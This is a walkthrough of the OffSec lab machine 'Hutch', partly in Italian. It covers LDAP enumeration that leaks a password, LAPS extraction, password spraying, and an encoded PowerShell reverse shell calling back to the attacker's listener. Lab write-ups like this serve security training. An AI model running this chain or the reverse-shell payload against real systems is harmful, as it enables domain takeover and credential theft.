Vai al contenuto

Hutch

Network

  • Ip Target: 192.168.166.122

Enumeration

Port Service Version Notes
53/tcp domain Simple DNS Plus DNS
80/tcp http Microsoft IIS httpd HTTP
88/tcp kerberos-sec Microsoft Windows Kerberos KERBEROS
135/tcp msrpc Microsoft Windows RPC MSRPC
139/tcp netbios-ssn Microsoft Windows Active Directory LDAP LDAP
389/tcp ldap LDAP
445/tcp microsoft-ds SMB
464/tcp kpasswd5
593/tcp http-rpc-epmap Microsoft Windows RPC MSRPC
636/tcp ldapssl LDAP
3268/tcp globalcatLDAP Microsoft Windows Active Directory LDAP LDAP
3269/tcp globalcatLDAPssl LDAP
5985/tcp wsman Microsoft HTTPAPI OMI
9389/tcp adws .NET Message Framing
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ sudo nmap -Pn -p- -oN alltcp_ports.txt 192.168.166.122
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-24 17:49 CET
Nmap scan report for 192.168.166.122
Host is up (0.11s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49666/tcp open  unknown
49668/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49676/tcp open  unknown
49692/tcp open  unknown
49755/tcp open  unknown
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ sudo nmap -Pn -sC -sV -p53,80,88,135,389,445,464,593,636,3268,3269,5985,9389 -oN alltcp.txt 192.168.166.122
[sudo] password for momphucker: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-24 18:13 CET
Nmap scan report for 192.168.166.122
Host is up (0.052s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/10.0
| http-webdav-scan: 
|   Server Type: Microsoft-IIS/10.0
|   WebDAV type: Unknown
|   Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
|_  Server Date: Tue, 24 Dec 2024 17:13:57 GMT
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-24 17:13:53Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-12-24T17:13:59
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Port 80

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ sudo feroxbuster -u http://192.168.166.122 -w /usr/share/dirb/wordlists/big.txt

001.png

002.png

Port 445

Port 389, 636, 3268, 3269

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ ldapsearch -x -H ldap://192.168.166.122  -b "dc=hutch,dc=offsec"

[...]
# Freddy McSorley, Users, hutch.offsec
dn: CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Freddy McSorley
description: Password set to CrabSharkJellyfish192 at user's request. Please c
 hange on next login.
distinguishedName: CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec
instanceType: 4
whenCreated: 20201104053505.0Z
whenChanged: 20210216133934.0Z
uSNCreated: 12831
uSNChanged: 49179
name: Freddy McSorley
objectGUID:: TxilGIhMVkuei6KplCd8ug==
userAccountControl: 66048
badPwdCount: 1384
codePage: 0
countryCode: 0
badPasswordTime: 133795403581235365
lastLogoff: 0
lastLogon: 132579563744834908
pwdLastSet: 132489417058152751
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnWwQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: fmcsorley
sAMAccountType: 805306368
userPrincipalName: fmcsorley@hutch.offsec
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=hutch,DC=offsec
dSCorePropagationData: 20201104053513.0Z
dSCorePropagationData: 16010101000001.0Z
lastLogonTimestamp: 132579563744834908
msDS-SupportedEncryptionTypes: 0

[...]
La descrizione dell'utente fmcsorley mostra che la password è stata impostata a CrabSharkJellyfish192.

Vengono inoltre rilevati i seguenti utenti:

Bash
rplacidi
opatry
ltaunton
acostello
jsparwell
oknee
jmckendry
avictoria
jfrarey
eaburrow
cluddy
agitthouse
fmcsorley
Administrator

Exploit

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ bloodhound-python -u fmcsorley -p CrabSharkJellyfish192 -d hutch.offsec -c All -ns 192.168.166.122
INFO: Found AD domain: hutch.offsec
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (hutchdc.hutch.offsec:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: hutchdc.hutch.offsec
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: hutchdc.hutch.offsec
INFO: Found 18 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: hutchdc.hutch.offsec
INFO: Done in 00M 12S
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ ll
total 168
-rw-r--r-- 1 momphucker momphucker  3914 Dec 27 10:57 20241227105713_computers.json
-rw-r--r-- 1 momphucker momphucker 25435 Dec 27 10:57 20241227105713_containers.json
-rw-r--r-- 1 momphucker momphucker  3092 Dec 27 10:57 20241227105713_domains.json
-rw-r--r-- 1 momphucker momphucker  3970 Dec 27 10:57 20241227105713_gpos.json
-rw-r--r-- 1 momphucker momphucker 79344 Dec 27 10:57 20241227105713_groups.json
-rw-r--r-- 1 momphucker momphucker  1642 Dec 27 10:57 20241227105713_ous.json
-rw-r--r-- 1 momphucker momphucker 42366 Dec 27 10:57 20241227105713_users.json
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ wget https://raw.githubusercontent.com/p0dalirius/pyLAPS/main/pyLAPS.py
--2024-12-27 11:02:32--  https://raw.githubusercontent.com/p0dalirius/pyLAPS/main/pyLAPS.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17714 (17K) [text/plain]
Saving to: ‘pyLAPS.py’

pyLAPS.py                              100%[============================================================================>]  17.30K  --.-KB/s    in 0.005s  

2024-12-27 11:02:32 (3.27 MB/s) - ‘pyLAPS.py’ saved [17714/17714]


┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ ll
total 188
-rw-r--r-- 1 momphucker momphucker  3914 Dec 27 10:57 20241227105713_computers.json
-rw-r--r-- 1 momphucker momphucker 25435 Dec 27 10:57 20241227105713_containers.json
-rw-r--r-- 1 momphucker momphucker  3092 Dec 27 10:57 20241227105713_domains.json
-rw-r--r-- 1 momphucker momphucker  3970 Dec 27 10:57 20241227105713_gpos.json
-rw-r--r-- 1 momphucker momphucker 79344 Dec 27 10:57 20241227105713_groups.json
-rw-r--r-- 1 momphucker momphucker  1642 Dec 27 10:57 20241227105713_ous.json
-rw-r--r-- 1 momphucker momphucker 42366 Dec 27 10:57 20241227105713_users.json
-rw-r--r-- 1 momphucker momphucker 17714 Dec 27 11:02 pyLAPS.py

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ chmod +x pyLAPS.py

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ ./pyLAPS.py --action get -d hutch.offsec -u fmcsorley -p CrabSharkJellyfish192 --dc-ip 192.168.166.122
                 __    ___    ____  _____
    ____  __  __/ /   /   |  / __ \/ ___/
   / __ \/ / / / /   / /| | / /_/ /\__ \   
  / /_/ / /_/ / /___/ ___ |/ ____/___/ /   
 / .___/\__, /_____/_/  |_/_/    /____/    v1.2
/_/    /____/           @podalirius_           

[+] Extracting LAPS passwords of all computers ... 
  | HUTCHDC$             : #Wa8ls156!Wub}
[+] All done!
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ crackmapexec smb 192.168.166.122 -u users.txt -p '#Wa8ls156!Wub}' --continue-on-success
SMB         192.168.166.122 445    HUTCHDC          [*] Windows 10 / Server 2019 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\rplacidi:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\opatry:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\ltaunton:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\acostello:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\jsparwell:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\oknee:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\jmckendry:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\avictoria:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\jfrarey:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\eaburrow:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\cluddy:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\agitthouse:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\fmcsorley:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [+] hutch.offsec\Administrator:#Wa8ls156!Wub} (Pwn3d!)

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ evil-winrm -i 192.168.166.122 -u Administrator -p '#Wa8ls156!Wub}' 

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
hutch\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIANAA4ACIALAA0ADQANQA1ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==

Privilege Escalation

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ nc -nvlp 4455
listening on [any] 4455 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.166.122] 50865

PS C:\Users\Administrator\Documents> whoami
hutch\administrator

003.png

004.png